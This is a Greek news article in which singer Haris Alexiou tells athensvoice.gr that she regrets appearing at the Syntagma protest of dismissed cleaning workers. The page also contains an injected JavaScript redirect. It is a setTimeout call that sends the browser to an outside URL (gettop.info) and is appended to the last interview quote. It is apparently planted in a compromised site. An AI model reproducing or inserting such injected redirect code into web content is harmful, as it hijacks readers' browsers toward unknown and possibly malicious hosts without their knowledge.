Μετάνιωσε η Χαρούλα: Δεν έπρεπε να πάω στο Σύνταγμα για τις καθαρίστριες

0
12

 

«Μετανιωμένη»εμφανίζεται η αγαπημένη καλλιτέχνις Χάρις Αλεξίου για την εμφάνιση της στη συγκέντρωση διαμαρτυρίας των καθαριστριών όπου φόρεσε και το κόκκινο γάντι σε ένδειξη συμπαράστασης στις διαδηλώτριες.

Σε συνέντευξη που έδωσε στην athensvoice.gr η Χάρις Αλεξίου δε διστάζει να εκφράσει την… αλλαγή στάσης της λέγοντας χαρακτηριστικά:

«Το γάντι αυθόρμητο αλλά και ωραίο. Κοίταξε, τη θεωρώ σήμερα μια αφελή πράξη, όχι για το γιατί αλλά για το πώς. Το να πάω να τραγουδήσω για κάποιους ανθρώπους που “διαδηλώνουν” το πρόβλημά τους το έχω κάνει πολλές φορές και θα το ξανακάνω βέβαια. Οι γυναίκες αυτές μου ζήτησαν να πάω να τραγουδήσω και το δέχτηκα.
Δεν φαντάστηκα πως θα το οικειοποιηθεί ο ΣΥΡΙΖΑ. Δεν θεωρώ λάθος που πήγα να τραγουδήσω για μια μερίδα απολυμένων γυναικών ούτε με νοιάζει η κακόβουλη κριτική – έχω μέσα μου τη δική μου φωνή δικαιοσύνης που με ησυχάζει.

Αλλά, βρε παιδί μου, δεν έπρεπε να πάω στο Σύνταγμα. Λειτουργώ αυθόρμητα και καμιά φορά και παρορμητικά. Μόνο σε ό,τι έχει να κάνει με συναυλίες φιλανθρωπικού τύπου είμαι πολύ προσεχτική πλέον, γιατί έχουν δει κι εκεί τα μάτια μου…»

Είστε πιο «πονηρεμένη» σήμερα; τη ρωτά ο δημοσιογράφος και εκείνη απαντά: «Αναμφίβολα. Μη με ρωτήσεις τώρα να σου πω και για τα κανάλια – δεν θα πω τίποτα. Έχω δει και πολύ “House of Cards” και μάλλον βοήθησε κι αυτό» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here